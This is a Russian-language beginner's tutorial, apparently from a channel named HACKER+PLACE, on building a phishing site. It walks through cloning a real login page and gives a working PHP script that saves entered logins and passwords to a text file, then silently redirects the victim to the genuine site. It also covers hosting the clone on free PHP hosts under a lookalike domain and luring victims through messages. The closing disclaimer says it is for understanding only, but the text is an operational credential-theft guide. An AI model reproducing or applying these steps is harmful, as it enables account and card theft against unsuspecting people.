Быстро пишем простой фишинг!

HACKER+PLACE

В этой статье я научу как создать фишинговую страницу с нуля, даже если ты вообще в этом не шаришь.

Короче говоря, займемся кражей паролей пользователя ⚡️

Копирование​

Для начала нам нужно скопировать страницу и выглядеть она должна идентично настоящей.

Чтобы пользователь, зашедший туда, увидел привычную и знакомую форму входа и без лишних размышлений о адресе страницы ввёл свой логин и пароль.

• Создаём для фейка отдельную папку. Туда и будем скидывать все нужные для него файлы
• Открываем нужный нам сайт в браузере и заходим на страницу авторизации
• Сохраняем эту страницу: файл - сохранить как... В появившемся окне выбираем тип сохраняемого файла: HTML-файл с изображениями, имя: index (лучше сохранить полную версию страницы).

Разбираемся в HTML​

• С помощью блокнота открываем исходный код сохраненной страницы index.htm

Много странных закорючек - это исходный код страницы

Как говориться “глаза бояться, а руки делают”

, поэтому начинаем фокусничать

Когда вы сохраняли страницу, рядом с полем для ввода логина и пароля наверняка были подписи (логично предположить что там было написано "логин", "пароль"). Вот по ним и будем ориентироваться. Ищем среди всего этого безобразия такие слова. Рядом с ними на странице у нас располагались поля ввода логина и пасса. В html коде они будут выглядеть примерно вот так:

Код:

Код:

<input type="text" name="login" value="" ......

<input type="password" name="password" ......

Имена полей (выделены жирным, в коде идут после "name=") не всегда будут именно login и password. Где-то это могут быть e-mail и pass , а где-то и username, parol.(оформление и названия зависит от кодера и сайта)

P.S. Блок с надписями "логин", "пароль" и формами ввода почти всегда находится в тэге <form>.

• Временно записываем или запоминаем имена этих паролей
• Ищем через Ctrl+F «action»

Код:

<form name="login" [U]action="users/passcheck.php"[/U] method="post" onsubmit="return check();">

• Меняем строку и прописываем параметру action значение login.php (если параметра action там нет - введите его сами: action="login.php")
• Ищем параметр method (в той же строчке что form и action) и ставим ему значение “post” или “get”
• Сохраняемся и закрываем

Волшебный скрипт​

Наш скрипт будет выполнять самую важную функцию – перехват и запись введенных логина и пароля.

Код:

Код:

<?PHP

$Log = $_POST['login'];

$Pass = $_POST['password'];

$log = fopen("database.txt","at");

fwrite($log,"\n $Log:$Pass \n");

fclose($log);

echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://lleo.aha.ru/na/'></head></html>";

?>

А теперь по полочкам:

1. В первых двух строках переменным Log и Pass присваиваются значения соответствующих полей из предыдущего файла. Именно для этого мы записывали названия полей с сохранённой страницы: мы должны указать их скрипту. Меняем login и password из квадратных скобок на то, как были названы поля ввода на нашей сохранённой странице (Кавычки не трогаем!).
2. В третьей строке происходит открытие файла database.txt для записи. Можете назвать этот файл как хотите, хоть IIACCbI_JIOXOB.txt)) Главное - не забудьте как назвали (название должно быть написано английскими буквами) и создайте текстовый документ с таким именем в папке с фейком.
3. Четвёртая строка - запись в файл строки вида \n $Log:$Pass \n, где \n - переход на новую строку, $Log:$Pass - значения переменных с логином и паролем, записанные через двоеточие.
4. Строка пятая - сохранение, закрытие файла.
5. Последняя строка - редирект (переадресация) на другую страницу (пока юзверь не просёк что это фейк). В этой строчке после URL= вписываем адрес страницы, куда попадёт пользователь сразу после того как введёт логин и пароль (и снова будте аккуратны с кавычкой после адреса - она должна там быть!). Лучше всего отправить его на настоящую страницу (ну откуда там вы страничку копировали?) с сообщением о вводе неверного пароля. Тогда бедолага решит что что-то не так ввёл, попорбует снова и зайдёт, ничего не заподозрив!

• Сохраняем файл с именем login.php в папку с фейком

Выход в мир Интернета​

Нам понадобится бесплатный хостинг с поддержкой php

Например:

Freehostia

HostiMan.ru

Free.beget.ru

Free.sprinthost.ru

HyperHost.ua

Hostronavt.ru

Hostkoss.com

• Регистрируем домен на этом хосте с названием, максимально похожим на адрес страницы, которую мы подделываем (например Vk.login.com), чтобы нашей цели не бросалось в глаза
• Качаем Filezilla или любой другой файловый менеджер

• Подключаем полученный хост через Filezilla

Слева видим все папки и файлы нашего компьютера, справа – наш сервер. Осталось его только дополнить

• Перекидываем все сохраненные файлы нашей фишинговой страницы на новоиспеченный сайт.
• Создаем на сайте текстовый файл “database.txt” (В нем и будут сохраняться все введенные логины и пароли в виде: “log : pass”)

Вместо localhost будем открывать тот адрес, который мы зарегистрировали. Соответственно, файл с сохранёнными паролями будет находиться там же (http://наш_адрес/database.txt).

• В том же файловом менеджере ставим файлу максимальные права доступа – 777

Готово!

Теперь наш фишинговый сайт можно использовать в разных целях, но остался один главный шаг.

Социальная часть​

Самый сложный и творческий этап. Придется импровизировать как заманить жертву на фейк.

Все зависит от тематики и интересов жертвы.

Писать на почту, в другие месенджеры, хоть голубем эту ссылку отправляйте. Это полностью ваша фантазия

Итог:​

• Мы создали фейковую страницу какого-то сайта, где теперь можем заимствовать пароли (или даже банковские карты).
• По этой схеме можно создавать фейки за 10 минут

Это статья создана для того чтобы понять как создаются фишинговые сайты и автор не несет никакой ответственности за содеянное.

Спасибо что прочитал этот мануал надеюсь тебе будет полезно, если хочеш больше такой инфы подписывайся на канал HACKER+PLACE